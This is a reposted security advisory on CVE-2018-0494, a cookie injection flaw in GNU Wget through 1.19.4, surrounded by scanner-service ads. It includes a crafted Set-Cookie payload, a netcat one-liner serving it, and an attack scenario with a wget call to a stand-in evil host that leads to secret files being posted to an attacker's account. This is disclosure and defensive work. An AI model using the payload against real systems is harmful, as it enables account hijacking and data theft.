gnu wget cookie injection

▸▸▸ Exploit & Vulnerability >>   local exploit & linux vulnerability




gnu wget cookie injection Code Code...
				
GNU Wget Cookie Injection [CVE-2018-0494] ========================================= The latest version of this advisory is available at: https://sintonen.fi/advisories/gnu-wget-cookie-injection.txt Overview -------- GNU Wget is susceptible to a malicious web server injecting arbitrary cookies to the cookie jar file. Description ----------- Normally a website should not be able to set cookies for other domains. Due to insufficient input validation GNU Wget can be tricked into storing arbitrary cookie values to the cookie jar file, bypassing this security restriction. Impact ------ An external attacker is able to inject arbitrary cookie values cookie jar file, adding new or replacing existing cookie values. Details ------- The discovered vulnerability, described in more detail below, enables the attack described here in brief. 1. The attacker controlled web site sends a specially crafted Set-Cookie -header to inject a new authentication cookie for example.com, replacing the existing one. In order to be successful the victim must perform a wget operation on the attacker controller site, for example: wget --load-cookies jar.txt --save-cookies jar.txt https://evil.invalid 2. Victim uses wget to post some secret the the api.example.com: wget --load-cookies jar.txt --post-file secret.txt https://example.com/upload Since the attacker was able to replace the authentication cookie for example.com, the secret.txt data will be posted to attacker's account instead to that of the victim. Vulnerabilities --------------- 1. CWE-20: Improper Input Validation in Set-Cookie parsing [CVE-2018-0494] The cookie parsing implementation does too lax input validation when parsing the Set-Cookie response from the server. Consider the following malicious response: HTTP/1.1 200 OK Content-Length: 0 Set-Cookie: foo="bar .google.com TRUE / FALSE 1900000000 injected cookie ";expires=Thursday, 01-Jan-2032 08:00:00 GMT When parsed by Wget and stored to a cookie jar file it will appear as: # HTTP cookie file. # Generated by Wget on 2018-04-27 23:28:21. # Edit at your own risk. 127.0.0.1:7777 FALSE / FALSE 1956556800 foo "bar .google.com TRUE / FALSE 1900000000 injected cookie " Since the Wget cookie jar parser skips any leading spaces, the .google.com line will be picked up. Note: The order in which the hosts/domains are stored in the cookie jar is derived from the hashing function used to speed up the lookups. If an existing cookie is to be replaced the server hostname used to serve the Set-Cookie will need to be carefully chosen to result in hash entry below the targeted domain. If not done, the original cookie will be used instead of the injected one. Proof of Concept ---------------- 1. Set up a minimal web server, good for 1 request: $ echo -ne 'HTTP/1.1 200 OK\r\nContent-Length: 0\r\nSet-Cookie: foo="bar\r\n\x20.google.com\tTRUE\t/\tFALSE\t1900000000\tinjected\tcookie\r\n\t";expires=Thursday, 01-Jan-2032 08:00:00 GMT\r\n\r\n' | nc -v -l 7777 2. Fetch the evil url: $ wget --save-cookies jar.txt http://127.0.0.1:7777/plop 3. Examine the resulting cookie jar file: $ cat jar.txt Vulnerable versions ------------------- The following GNU Wget versions are confirmed vulnerable: - 1.7 thru 1.19.4 Mitigation ---------- 1. Upgrade to GNU Wget 1.19.5 or later, or to appropriate security updated package in your distribution Credits ------- The vulnerability was discovered by Harry Sintonen / F-Secure Corporation. Timeline -------- 2018.04.26 discovered & reported the vulnerability 2018.04.27 CVE-2018-0494 assigned 2018.05.06 GNU Wget 1.19.5 released with the fix 2018.05.06 public disclosure of the advisory

Gnu wget cookie injection Vulnerability / Exploit Source : Gnu wget cookie injection



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.